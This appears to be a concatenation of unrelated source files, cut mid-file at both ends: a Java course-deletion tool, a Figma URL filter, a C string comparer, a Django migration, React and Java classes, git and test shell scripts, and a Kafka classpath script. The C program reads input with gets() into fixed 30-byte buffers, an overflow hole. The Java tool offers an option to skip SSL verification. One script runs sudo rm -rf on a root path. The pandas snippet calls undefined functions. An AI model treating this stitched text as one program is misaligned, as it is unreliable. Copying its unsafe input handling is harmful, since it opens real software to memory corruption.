error = true;
}
}
if (error) {
throw new ParseException("Required arguments missing");
}
}
public static void main(String[] args) {
if (System.getProperty("log4j.configuration") != null) {
PropertyConfigurator.configure(System.getProperty("log4j.configuration"));
} else {
ConsoleAppender console = new ConsoleAppender();
String PATTERN = "%d [%p|%c|%C{1}] %m%n";
console.setLayout(new PatternLayout(PATTERN));
console.setThreshold(Level.DEBUG);
console.activateOptions();
logger.setAdditivity(false);
logger.addAppender(console);
//Logger.getRootLogger().addAppender(console);
}
// Perform command line parsing in an as friendly was as possible.
// Could be improved
CommandLineParser parser = new PosixParser();
Options options = new Options();
// Use a map to store our options and loop over it to check and parse options via
// addAllOptions() and verifyOptions() below
Map<String, String> optionsAvailable = new HashMap<String, String>();
optionsAvailable.put("deletion-list", "The file containing the list of courses to delete");
optionsAvailable.put("user", "User with deletion privileges, usually bbsupport");
optionsAvailable.put("password", "<PASSWORD>");
optionsAvailable.put("url", "The Learn URL - usually https://example.com/bbcswebdav/courses");
options = addAllOptions (options, optionsAvailable);
CommandLine line = null;
try {
line = parser.parse(options, args);
verifyOptions(line, optionsAvailable);
} catch (ParseException e) {
// Detailed reason will be printed by verifyOptions above
logger.fatal("Incorrect options specified, exiting...");
System.exit(1);
}
Scanner scanner = null;
try {
scanner = new Scanner( new File(line.getOptionValue("deletion-list")));
} catch (FileNotFoundException e) {
logger.fatal("Cannot open file : " + e.getLocalizedMessage());
System.exit(1);
}
// By default we verify SSL certs
boolean verifyCertStatus = true;
if (line.hasOption("no-verify-ssl")) {
verifyCertStatus = false;
}
// Loop through deletion list and delete courses if they exist.
LearnServer instance;
try {
logger.debug("Attempting to open connection");
instance = new LearnServer(line.getOptionValue("user"), line.getOptionValue("password"), line.getOptionValue("url"), verifyCertStatus);
String currentCourse = null;
logger.debug("Connection open");
while(scanner.hasNextLine()) {
currentCourse = scanner.nextLine();
if (instance.exists(currentCourse)) {
try {
instance.deleteCourse(currentCourse);
logger.info("Processing " + currentCourse + " : Result - Deletion Successful");
} catch (IOException ioe) {
logger.error("Processing " + currentCourse + " : Result - Could not Delete (" + ioe.getLocalizedMessage() + ")");
}
} else {
logger.info("Processing " + currentCourse + " : Result - Course does not exist");
}
}
} catch (IllegalArgumentException e) {
logger.fatal(e.getLocalizedMessage());
if (logger.getLevel() == Level.DEBUG) {
e.printStackTrace();
}
System.exit(1);
} catch (IOException ioe) {
logger.debug(ioe);
logger.fatal(ioe.getMessage());
if (logger.getLevel() == Level.DEBUG) {
ioe.printStackTrace();
}
}
}
}
|
'use strict';
registerFilter({
url_regex: [/figma\.com/],
provider: 'figma',
provider_name: (_url) => 'Figma',
type: (_url) => 'DOCUMENT',
subtype: (_url) => 'FIGMA_DOCUMENT',
processors: [
// Project
{
source_id_processor: (url) => {
const rePath = /project\/[0-9]+/;
return reMatch(url.pathname, rePath, 0);
},
// i.e. 'Project Name – Figma' -> 'Project Name'
title_processor: (t) => `${t.split('–')[0].trim()}`,
},
// Document
{
source_id_processor: (url) => {
const rePath = /file\/[a-zA-Z0-9]+/;
return reMatch(url.pathname, rePath, 0);
},
// i.e. 'File Name – Figma' -> 'File Name'
title_processor: (t) => `${t.split('–')[0].trim()}`,
},
],
});
|
#include <stdio.h>
#include <string.h>
/* Function to compare two strings */
int compareStrings(char str1[], char str2[])
{
int i = 0, flag = 0;
while (str1[i] != '\0' && str2[i] != '\0') {
if (str1[i] != str2[i]) {
flag = 1;
break;
}
i++;
}
if (flag == 0 && str1[i] == '\0' && str2[i] == '\0')
return 1;
else
return 0;
}
/* Driver program to test above function */
int main()
{
char str1[30], str2[30];
printf("Enter the first string : \n");
gets(str1);
printf("Enter the second string : \n");
gets(str2);
if (compareStrings(str1, str2) == 1)
printf("Strings are identical \n");
else
printf("Strings are not identical \n");
return 0;
} |
<filename>hexa/plugins/connector_dhis2/migrations/0007_longer_text_fields.py
# Generated by Django 3.2.3 on 2021-06-11 12:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("connector_dhis2", "0006_sync_fine_tuning"),
]
operations = [
migrations.AlterField(
model_name="dataelement",
name="dhis2_name",
field=models.TextField(),
),
migrations.AlterField(
model_name="dataelement",
name="dhis2_short_name",
field=models.CharField(blank=True, max_length=200),
),
migrations.AlterField(
model_name="dataelement",
name="name",
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name="dataelement",
name="short_name",
field=models.CharField(blank=True, max_length=200),
),
migrations.AlterField(
model_name="indicator",
name="dhis2_name",
field=models.TextField(),
),
migrations.AlterField(
model_name="indicator",
name="dhis2_short_name",
field=models.CharField(blank=True, max_length=200),
),
migrations.AlterField(
model_name="indicator",
name="name",
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name="indicator",
name="short_name",
field=models.CharField(blank=True, max_length=200),
),
migrations.AlterField(
model_name="indicatortype",
name="dhis2_name",
field=models.TextField(),
),
migrations.AlterField(
model_name="indicatortype",
name="dhis2_short_name",
field=models.CharField(blank=True, max_length=200),
),
migrations.AlterField(
model_name="indicatortype",
name="name",
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name="indicatortype",
name="short_name",
field=models.CharField(blank=True, max_length=200),
),
migrations.AlterField(
model_name="instance",
name="name",
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name="instance",
name="short_name",
field=models.CharField(blank=True, max_length=200),
),
]
|
<reponame>linhhvo/newdle
import React from 'react';
import PropTypes from 'prop-types';
import {Icon} from 'semantic-ui-react';
import styles from './DayCarousel.module.scss';
export default function DayCarousel({
items,
numberOfVisible,
activeIndex,
activePosition,
step,
renderItem,
changeItem,
}) {
const next = () => {
const newIndex = (activeIndex + step) % items.length;
const nextPosition =
activePosition + step < numberOfVisible ? activePosition + step : numberOfVisible - 1;
if (changeItem) {
changeItem(items[newIndex], nextPosition);
}
};
const prev = () => {
const newIndex = Math.max(activeIndex - step, 0);
const nextPosition = activePosition - step >= 0 ? activePosition - step : 0;
if (changeItem) {
changeItem(items[newIndex], nextPosition);
}
};
let showPrevBtn, showNextBtn, fromIndex, toIndex;
if (numberOfVisible >= items.length) {
showPrevBtn = showNextBtn = false;
fromIndex = 0;
toIndex = items.length;
} else {
showPrevBtn = activeIndex !== 0;
showNextBtn = activeIndex < items.length - 1;
fromIndex = activeIndex - activePosition < 0 ? 0 : activeIndex - activePosition;
toIndex = activeIndex + (numberOfVisible - activePosition);
}
return (
<>
{showPrevBtn && (
<Icon size="big" name="angle left" onClick={prev} className={styles['prev-icon']} />
)}
{showNextBtn && (
<Icon size="big" name="angle right" onClick={next} className={styles['next-icon']} />
)}
{items.slice(fromIndex, toIndex).map(renderItem)}
</>
);
}
DayCarousel.propTypes = {
items: PropTypes.array.isRequired,
numberOfVisible: PropTypes.number,
activeIndex: PropTypes.number,
activePosition: PropTypes.number,
step: PropTypes.number,
renderItem: PropTypes.func.isRequired,
changeItem: PropTypes.func,
};
DayCarousel.defaultProps = {
numberOfVisible: 3,
activeIndex: 0,
activePosition: 0,
step: 1,
changeItem: null,
};
|
#!/bin/sh
#
# Change the author name and/or email of a single commit.
#
# change-author [-f] commit-to-change [branch-to-rewrite [new-name [new-email]]]
#
# If -f is supplied it is passed to "git filter-branch".
#
# If <branch-to-rewrite> is not provided or is empty HEAD will be used.
# Use "--all" or a space separated list (e.g. "master next") to rewrite
# multiple branches.
#
# If <new-name> (or <new-email>) is not provided or is empty, the normal
# user.name (user.email) Git configuration value will be used.
#
force=''
if test "x$1" = "x-f"; then
force='-f'
shift
fi
die() {
printf '%s\n' "$@"
exit 128
}
targ="$(git rev-parse --verify "$1" 2>/dev/null)" || die "$1 is not a commit"
br="${2:-HEAD}"
TARG_COMMIT="$targ"
TARG_NAME="${3-}"
TARG_EMAIL="${4-}"
export TARG_COMMIT TARG_NAME TARG_EMAIL
filt='
if test "$GIT_COMMIT" = "$TARG_COMMIT"; then
if test -n "$TARG_EMAIL"; then
GIT_AUTHOR_EMAIL="$TARG_EMAIL"
export GIT_AUTHOR_EMAIL
else
unset GIT_AUTHOR_EMAIL
fi
if test -n "$TARG_NAME"; then
GIT_AUTHOR_NAME="$TARG_NAME"
export GIT_AUTHOR_NAME
else
unset GIT_AUTHOR_NAME
fi
fi
'
git filter-branch $force --env-filter "$filt" -- $br |
#!/bin/bash
# Script to execute tests on OPERA DSWx-HLS PGE Docker image
#
set -e
# Parse args
while [[ $# -gt 0 ]]; do
case $1 in
-h|--help)
echo "Usage: test_dswx_hls.sh [-h|--help] [-t|--tag <tag>] [-w|--workspace <path>]"
exit 0
;;
-t|--tag)
TAG=$2
shift
shift
;;
-w|--workspace)
WORKSPACE=$2
shift
shift
;;
-*|--*)
echo "Unknown arguments $1 $2, ignoring..."
shift
shift
;;
*)
echo "Unknown argument $1, ignoring..."
shift
;;
esac
done
echo '
=====================================
Testing DSWx-HLS PGE Docker image...
=====================================
'
PGE_NAME="dswx_hls"
IMAGE="opera_pge/${PGE_NAME}"
TEST_RESULTS_REL_DIR="test_results"
# defaults
[ -z "${WORKSPACE}" ] && WORKSPACE=$(realpath $(dirname $(realpath $0))/../..)
[ -z "${TAG}" ] && TAG="${USER}-dev"
TEST_RESULTS_DIR="${WORKSPACE}/${TEST_RESULTS_REL_DIR}/${PGE_NAME}"
echo "Test results output directory: ${TEST_RESULTS_DIR}"
mkdir --mode=775 --parents ${TEST_RESULTS_DIR}
chmod -R 775 ${TEST_RESULTS_DIR}
# Use the environment of the docker image to run linting, tests, etc...
# Note the change of working directory (-w) to a directory without
# Python code so that import statements favor Python code found in the
# Docker image rather than code found on the host.
DOCKER_RUN="docker run --rm \
-v ${WORKSPACE}:/workspace \
-w /workspace/${TEST_RESULTS_REL_DIR}
-u ${UID}:$(id -g) \
--entrypoint /opt/conda/bin/pge_tests_entrypoint.sh \
${IMAGE}:${TAG}"
# Configure a trap to set permissions on exit regardless of whether the testing succeeds
function set_perms {
# Open up permissions on all test results we can be sure the CI system can
# delete them after they're archived within Jenkins
${DOCKER_RUN} bash -c "find \
/workspace/${TEST_RESULTS_REL_DIR} -type d -exec chmod 775 {} +"
${DOCKER_RUN} bash -c "find \
/workspace/${TEST_RESULTS_REL_DIR} -type f -exec chmod 664 {} +"
}
trap set_perms EXIT
# linting and pep8 style check (configured by .flake8 and .pylintrc)
${DOCKER_RUN} flake8 \
--config /home/conda/opera/.flake8 \
--jobs auto \
--exit-zero \
--application-import-names opera \
--output-file /workspace/${TEST_RESULTS_REL_DIR}/${PGE_NAME}/flake8.log \
/home/conda/opera
${DOCKER_RUN} pylint \
--rcfile=/home/conda/opera/.pylintrc \
--jobs 0 \
--exit-zero \
--output=/workspace/${TEST_RESULTS_REL_DIR}/${PGE_NAME}/pylint.log \
--enable-all-extensions \
/home/conda/opera
# pytest (including code coverage)
${DOCKER_RUN} bash -c "pytest \
--junit-xml=/workspace/${TEST_RESULTS_REL_DIR}/${PGE_NAME}/pytest-junit.xml \
--cov=/home/conda/opera/pge \
--cov=/home/conda/opera/scripts \
--cov=/home/conda/opera/util \
--cov-report=term \
--cov-report=html:/workspace/${TEST_RESULTS_REL_DIR}/${PGE_NAME}/coverage_html \
/workspace/src/opera/test > /workspace/${TEST_RESULTS_REL_DIR}/${PGE_NAME}/pytest.log 2>&1"
echo "DSWx-HLS PGE Docker image test complete"
exit 0
|
/*
* Copyright [2018] [<NAME>]
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jacpfx.vxms.rest.base.response;
import io.vertx.core.buffer.Buffer;
import io.vertx.ext.web.Cookie;
import io.vertx.ext.web.FileUpload;
import io.vertx.ext.web.RoutingContext;
import java.util.Set;
/**
* Created by <NAME> on 12.01.16. This class allows easy access to Request values like
* Cookies, parameters and attributes.
*/
public class RESTRequest {
private final RoutingContext context;
/** @param context the Vert.x routing context */
public RESTRequest(RoutingContext context) {
this.context = context;
}
/**
* Returns the parameter value for the given parameter name
*
* @param paramName the http parameter name
* @return the parameter value
*/
public String param(String paramName) {
return context.request().getParam(paramName);
}
/**
* Returns the header value for requested name
*
* @param headerName the header name
* @return the requested header value
*/
public String header(String headerName) {
return context.request().getHeader(headerName);
}
/**
* Returns the form attribute for requested name
*
* @param attributeName the name of the attribute
* @return the attribute requested
*/
public String formAttribute(String attributeName) {
return context.request().getFormAttribute(attributeName);
}
/**
* Returns a set with uploaded files
*
* @return the set of files
*/
public Set<FileUpload> fileUploads() {
return context.fileUploads();
}
/**
* Returns a set of cookies
*
* @return the set of cookies
*/
public Set<Cookie> cookies() {
return context.cookies();
}
/**
* Returns a cookie by name
*
* @param name the cookie name
* @return the cookie
*/
public Cookie cookie(String name) {
return context.getCookie(name);
}
/**
* Returns the request body
*
* @return the request body
*/
public Buffer body() {
return context.getBody();
}
}
|
#!/bin/bash
# This script parses in the command line parameters from runCust,
# maps them to the correct command line parameters for DispNet training script and launches that task
# The last line of runCust should be: bash $CONFIG_FILE --data-dir $DATA_DIR --log-dir $LOG_DIR
# Parse the command line parameters
# that runCust will give out
DATA_DIR=NONE
LOG_DIR=NONE
CONFIG_DIR=NONE
MODEL_DIR=NONE
# Parsing command line arguments:
while [[ $# > 0 ]]
do
key="$1"
case $key in
-h|--help)
echo "Usage: run_dispnet_training_philly.sh [run_options]"
echo "Options:"
echo " -d|--data-dir <path> - directory path to input data (default NONE)"
echo " -l|--log-dir <path> - directory path to save the log files (default NONE)"
echo " -p|--config-file-dir <path> - directory path to config file directory (default NONE)"
echo " -m|--model-dir <path> - directory path to output model file (default NONE)"
exit 1
;;
-d|--data-dir)
DATA_DIR="$2"
shift # pass argument
;;
-p|--config-file-dir)
CONFIG_DIR="$2"
shift # pass argument
;;
-m|--model-dir)
MODEL_DIR="$2"
shift # pass argument
;;
-l|--log-dir)
LOG_DIR="$2"
;;
*)
echo Unkown option $key
;;
esac
shift # past argument or value
done
# Prints out the arguments that were passed into the script
echo "DATA_DIR=$DATA_DIR"
echo "LOG_DIR=$LOG_DIR"
echo "CONFIG_DIR=$CONFIG_DIR"
echo "MODEL_DIR=$MODEL_DIR"
# Run training on philly
# Add the root folder of the code to the PYTHONPATH
export PYTHONPATH=$PYTHONPATH:$CONFIG_DIR
# Run the actual job
python $CONFIG_DIR/examples/ResNet/cifar-ann-v2.py \
--data_dir=$DATA_DIR \
--log_dir=$LOG_DIR \
--model_dir=$MODEL_DIR \
--num_classes=100 \
-f=5 \
--opt_at=-1 \
-n=13 \
-c=16 \
--samloss=2 \
--batch_size=128 \
--exp_gamma=0.3 --sum_rand_ratio=2 --last_reward_rate=0.8
|
#!/usr/bin/env bash
while true; do
clear ; cat octelpus/octelpus1 ; sleep 0.3
clear ; cat octelpus/octelpus2 ; sleep 0.3
clear ; cat octelpus/octelpus3 ; sleep 0.3
clear ; cat octelpus/octelpus4 ; sleep 0.3
done
|
package com.telenav.osv.network.model.tagging;
import com.google.gson.annotations.Expose;
import com.google.gson.annotations.SerializedName;
public class ResponseModelTaggingData {
@SerializedName("id")
@Expose
public String id;
@SerializedName("dataType")
@Expose
public String dataType;
@SerializedName("dateAdded")
@Expose
public String dateAdded;
@SerializedName("filemd5")
@Expose
public String filemd5;
@SerializedName("filename")
@Expose
public String filename;
@SerializedName("filepath")
@Expose
public String filepath;
@SerializedName("filesize")
@Expose
public String filesize;
@SerializedName("processingError")
@Expose
public String processingError;
@SerializedName("processingResult")
@Expose
public Object processingResult;
@SerializedName("processingStatus")
@Expose
public String processingStatus;
@SerializedName("sequence")
@Expose
public ResponseModelTaggingSequence responseModelTaggingSequence;
@SerializedName("sequenceIndex")
@Expose
public String sequenceIndex;
@SerializedName("status")
@Expose
public String status;
@SerializedName("storage")
@Expose
public String storage;
/**
* No args constructor for use in serialization
*/
public ResponseModelTaggingData() {
}
/**
* @param filepath
* @param sequenceIndex
* @param status
* @param filemd5
* @param dateAdded
* @param id
* @param processingError
* @param dataType
* @param filesize
* @param processingStatus
* @param responseModelTaggingSequence
* @param processingResult
* @param filename
* @param storage
*/
public ResponseModelTaggingData(String id, String dataType, String dateAdded, String filemd5, String filename, String filepath, String filesize, String processingError,
Object processingResult, String processingStatus, ResponseModelTaggingSequence responseModelTaggingSequence, String sequenceIndex,
String status, String storage) {
super();
this.id = id;
this.dataType = dataType;
this.dateAdded = dateAdded;
this.filemd5 = filemd5;
this.filename = filename;
this.filepath = filepath;
this.filesize = filesize;
this.processingError = processingError;
this.processingResult = processingResult;
this.processingStatus = processingStatus;
this.responseModelTaggingSequence = responseModelTaggingSequence;
this.sequenceIndex = sequenceIndex;
this.status = status;
this.storage = storage;
}
}
|
/*
* Copyright 2014-2018 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language
* governing permissions and limitations under the License.
*/
package org.dbflute.logic.replaceschema.schemainitializer;
import java.sql.Connection;
import java.util.List;
import org.dbflute.logic.jdbc.metadata.info.DfForeignKeyMeta;
import org.dbflute.logic.jdbc.metadata.info.DfTableMeta;
/**
* @author jflute
*/
public class DfSchemaInitializerMySQL extends DfSchemaInitializerJdbc {
// ===================================================================================
// Drop Foreign Key
// ================
@Override
protected void dropForeignKey(Connection connection, List<DfTableMeta> tableMetaInfoList) {
final DfDropForeignKeyByJdbcCallback callback = new DfDropForeignKeyByJdbcCallback() {
public String buildDropForeignKeySql(DfForeignKeyMeta metaInfo) {
final String foreignKeyName = metaInfo.getForeignKeyName();
final String localTableName = metaInfo.getLocalTableSqlName();
final StringBuilder sb = new StringBuilder();
sb.append("alter table ").append(localTableName).append(" drop foreign key ").append(foreignKeyName);
return sb.toString();
}
};
callbackDropForeignKeyByJdbc(connection, tableMetaInfoList, callback);
}
} |
#!/usr/bin/env bash
stopLocalstack() {
pushd tests/mock-aws
# clear down lambda containers still hanging around
printf "Removing lambda containers: "
containers=$(docker ps -a -q --filter ancestor="lambci/lambda:nodejs8.10" --format="{{.ID}}")
if [ -n "${containers}" ]; then
docker kill ${containers}
fi
pipenv run docker-compose down
popd
}
stopLocalstack
|
#! /bin/bash -e
set -o pipefail
set -o errexit
set -o nounset
if ! [ -f toolbox/entitlement/test.sh ]; then
echo "FATAL: entitlement scripts not found in $PWD/toolbox/entitlement/"
echo "INFO: $0 is intended only for running in the 'OpenShift PSAP CI artifacts' image. (INSIDE_CI_IMAGE=$INSIDE_CI_IMAGE)"
exit 1
fi
extract_entitlement_key() {
resource=$1
key=$2
RESOURCE_NAME=50-entitlement-pem
cat "$resource" \
| yq . \
| jq -r -c 'select(.metadata.name=="'${RESOURCE_NAME}'")|.spec.config.storage.files[0].contents.source' \
| sed 's|data:text/plain;charset=utf-8;base64,||g' \
| base64 -d \
> "$key"
}
echo "Testing if the cluster is already entitled ..."
if toolbox/entitlement/test.sh --no-inspect; then
echo "Cluster already entitled, skipping entitlement."
exit 0
fi
entitlement_deployed=0
ENTITLEMENT_PEM=${ENTITLEMENT_PEM:-/var/run/psap-entitlement-secret/entitlement.pem}
if [ -z "$ENTITLEMENT_PEM" ]; then
echo "INFO: no entitlement key provided (ENTITLEMENT_PEM)"
elif [ ! -e "$ENTITLEMENT_PEM" ]; then
echo "INFO: entitlement key doesn't exist (ENTITLEMENT_PEM=$ENTITLEMENT_PEM)"
else
echo "Deploying the entitlement with PEM key from ${ENTITLEMENT_PEM}"
toolbox/entitlement/deploy.sh --pem ${ENTITLEMENT_PEM}
entitlement_deployed=1
fi
ENTITLEMENT_RESOURCES=${ENTITLEMENT_RESOURCES:-/var/run/psap-entitlement-secret/01-cluster-wide-machineconfigs.yaml}
if [ "$entitlement_deployed" == 1 ]; then
# entitlement already deployed
true
elif [ -z "$ENTITLEMENT_RESOURCES" ]; then
echo "INFO: no entitlement resource provided (ENTITLEMENT_RESOURCES)"
elif [ ! -e "$ENTITLEMENT_RESOURCES" ]; then
echo "INFO: entitlement resource file doesn't exist (ENTITLEMENT_RESOURCES=$ENTITLEMENT_RESOURCES)"
else
ENTITLEMENT_KEY=/tmp/key.pem
extract_entitlement_key $ENTITLEMENT_RESOURCES $ENTITLEMENT_KEY
toolbox/entitlement/deploy.sh --pem "${ENTITLEMENT_KEY}"
entitlement_deployed=1
fi
if [ "$entitlement_deployed" == 0 ]; then
echo "FATAL: cluster isn't entitled and not entitlement provided (ENTITLEMENT_PEM)"
exit 1
fi
if ! toolbox/entitlement/wait.sh; then
echo "FATAL: Failed to properly entitle the cluster, cannot continue."
exit 1
fi |
import pandas as pd
# Read in the data
df = pd.read_csv('data.csv')
# Preprocess the data
df = preprocessData(df)
# Split the data into training and test
train_X, test_X, train_y, test_y = train_test_split(df.drop('X',axis=1),
df['X'], test_size=0.2)
# Save the training and test data to files
train_X.to_csv('train_X.csv', index=False)
test_X.to_csv('test_X.csv', index=False)
train_y.to_csv('train_y.csv', index=False)
test_y.to_csv('test_y.csv', index=False) |
zstyle ':completion:*:*:task:*' verbose yes
zstyle ':completion:*:*:task:*:descriptions' format '%U%B%d%b%u'
zstyle ':completion:*:*:task:*' group-name ''
alias t=task
compdef _task t=task
|
#!/usr/bin/env bash
#ppp="~/.xxx/xxxfile"
ppp="/root/.yyy/xxxfile"
sudo rm -rf $ppp
echo "Create $ppp..."
#if [ ! -d `dirname $ppp` ]; then
# mkdir -p `dirname $ppp`
#fi
sudo cat <<EOF >$ppp
i
like
it
anyway
EOF
ls -l $ppp
|
public static String longestCommonPrefix(String[] strs) {
if (strs.length == 0)
return "";
String prefix = strs[0];
for (int i = 1; i < strs.length; i++)
while (strs[i].indexOf(prefix) != 0) {
prefix = prefix.substring(0, prefix.length() - 1);
if (prefix.isEmpty())
return "";
}
return prefix;
} |
<filename>Code Challenges/python/equal_numbers_eda.py
# (user) problem
# we know two numbers, but we need to know if they are equal
# return true or false
# solution (product)
# use boolean check, return result
def is_same_num(num1, num2):
if num1 == num2:
return True
else:
return False
|
<reponame>LuckyChen73/WYNewsClassNine<filename>WYNewsClassNine/WYNewsClassNine/Classes/Home/ChannelView/WYChannelController.h
//
// WYChannelController.h
// WYNewsClassNine
//
// Created by chenWei on 2017/3/18.
// Copyright © 2017年 陈伟. All rights reserved.
//
#import <UIKit/UIKit.h>
@interface WYChannelController : UIViewController
@end
|
import os
class COSWrapper:
def __init__(self, access_key_id, secret_access_key):
self.access_key_id = access_key_id
self.secret_access_key = secret_access_key
# Additional initialization code for COS wrapper
def upload_file(self, file_path, bucket_name):
# Implementation for uploading a file to the specified bucket
pass
def download_file(self, file_name, bucket_name):
# Implementation for downloading a file from the specified bucket
pass
def list_files(self, bucket_name):
# Implementation for listing all files in the specified bucket
pass
class COSWrapperError(Exception):
pass
def monitor_training_run(cmd_parameters):
cw = None # COS wrapper handle
training_guid = cmd_parameters.get('training_id', None)
if cmd_parameters['command'] == 'package' and training_guid is not None:
try:
# Instantiate Cloud Object Storage wrapper
cw = COSWrapper(os.environ['AWS_ACCESS_KEY_ID'], os.environ['AWS_SECRET_ACCESS_KEY'])
# Additional code for monitoring training run status and skipping preparation steps
except COSWrapperError as cwe:
# Handle COSWrapperError
pass |
// Align bytecode unit test
//
// Copyright (C) 2008 <NAME>
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions
// are met:
// 1. Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// 2. Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
//
// THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND OTHER CONTRIBUTORS ``AS IS''
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR OTHER CONTRIBUTORS BE
// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//
#include <gtest/gtest.h>
#include "yasmx/BytecodeContainer.h"
#include "yasmx/Bytecode.h"
#include "yasmx/Expr.h"
#include "yasmx/IntNum.h"
TEST(AlignTest, Append)
{
yasm::BytecodeContainer container(0);
yasm::AppendAlign(container,
yasm::Expr(4),
yasm::Expr(), // fill
yasm::Expr(), // maxskip
0, // code fill
yasm::SourceLocation::getFromRawEncoding(5));
yasm::Bytecode& align = container.bytecodes_front();
// align always results in contents
EXPECT_TRUE(align.hasContents());
EXPECT_EQ(yasm::Bytecode::Contents::SPECIAL_OFFSET,
align.getSpecial());
EXPECT_EQ(5U, align.getSource().getRawEncoding());
EXPECT_TRUE(align.getFixed().empty());
}
|
#!/bin/bash
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
if [ $# -lt 1 ];
then
echo "USAGE: $0 [-daemon] [-name servicename] [-loggc] classname [opts]"
exit 1
fi
# CYGWIN == 1 if Cygwin is detected, else 0.
if [[ $(uname -a) =~ "CYGWIN" ]]; then
CYGWIN=1
else
CYGWIN=0
fi
if [ -z "$INCLUDE_TEST_JARS" ]; then
INCLUDE_TEST_JARS=false
fi
# Exclude jars not necessary for running commands.
regex="(-(test|test-sources|src|scaladoc|javadoc)\.jar|jar.asc)$"
should_include_file() {
if [ "$INCLUDE_TEST_JARS" = true ]; then
return 0
fi
file=$1
if [ -z "$(echo "$file" | egrep "$regex")" ] ; then
return 0
else
return 1
fi
}
base_dir=$(dirname $0)/..
if [ -z "$SCALA_VERSION" ]; then
SCALA_VERSION=2.13.5
if [[ -f "$base_dir/gradle.properties" ]]; then
SCALA_VERSION=`grep "^scalaVersion=" "$base_dir/gradle.properties" | cut -d= -f 2`
fi
fi
if [ -z "$SCALA_BINARY_VERSION" ]; then
SCALA_BINARY_VERSION=$(echo $SCALA_VERSION | cut -f 1-2 -d '.')
fi
# run ./gradlew copyDependantLibs to get all dependant jars in a local dir
shopt -s nullglob
if [ -z "$UPGRADE_KAFKA_STREAMS_TEST_VERSION" ]; then
for dir in "$base_dir"/core/build/dependant-libs-${SCALA_VERSION}*;
do
CLASSPATH="$CLASSPATH:$dir/*"
done
fi
for file in "$base_dir"/examples/build/libs/kafka-examples*.jar;
do
if should_include_file "$file"; then
CLASSPATH="$CLASSPATH":"$file"
fi
done
if [ -z "$UPGRADE_KAFKA_STREAMS_TEST_VERSION" ]; then
clients_lib_dir=$(dirname $0)/../clients/build/libs
streams_lib_dir=$(dirname $0)/../streams/build/libs
streams_dependant_clients_lib_dir=$(dirname $0)/../streams/build/dependant-libs-${SCALA_VERSION}
else
clients_lib_dir=/opt/kafka-$UPGRADE_KAFKA_STREAMS_TEST_VERSION/libs
streams_lib_dir=$clients_lib_dir
streams_dependant_clients_lib_dir=$streams_lib_dir
fi
for file in "$clients_lib_dir"/kafka-clients*.jar;
do
if should_include_file "$file"; then
CLASSPATH="$CLASSPATH":"$file"
fi
done
for file in "$streams_lib_dir"/kafka-streams*.jar;
do
if should_include_file "$file"; then
CLASSPATH="$CLASSPATH":"$file"
fi
done
if [ -z "$UPGRADE_KAFKA_STREAMS_TEST_VERSION" ]; then
for file in "$base_dir"/streams/examples/build/libs/kafka-streams-examples*.jar;
do
if should_include_file "$file"; then
CLASSPATH="$CLASSPATH":"$file"
fi
done
else
VERSION_NO_DOTS=`echo $UPGRADE_KAFKA_STREAMS_TEST_VERSION | sed 's/\.//g'`
SHORT_VERSION_NO_DOTS=${VERSION_NO_DOTS:0:((${#VERSION_NO_DOTS} - 1))} # remove last char, ie, bug-fix number
for file in "$base_dir"/streams/upgrade-system-tests-$SHORT_VERSION_NO_DOTS/build/libs/kafka-streams-upgrade-system-tests*.jar;
do
if should_include_file "$file"; then
CLASSPATH="$file":"$CLASSPATH"
fi
done
if [ "$SHORT_VERSION_NO_DOTS" = "0100" ]; then
CLASSPATH="/opt/kafka-$UPGRADE_KAFKA_STREAMS_TEST_VERSION/libs/zkclient-0.8.jar":"$CLASSPATH"
CLASSPATH="/opt/kafka-$UPGRADE_KAFKA_STREAMS_TEST_VERSION/libs/zookeeper-3.4.6.jar":"$CLASSPATH"
fi
if [ "$SHORT_VERSION_NO_DOTS" = "0101" ]; then
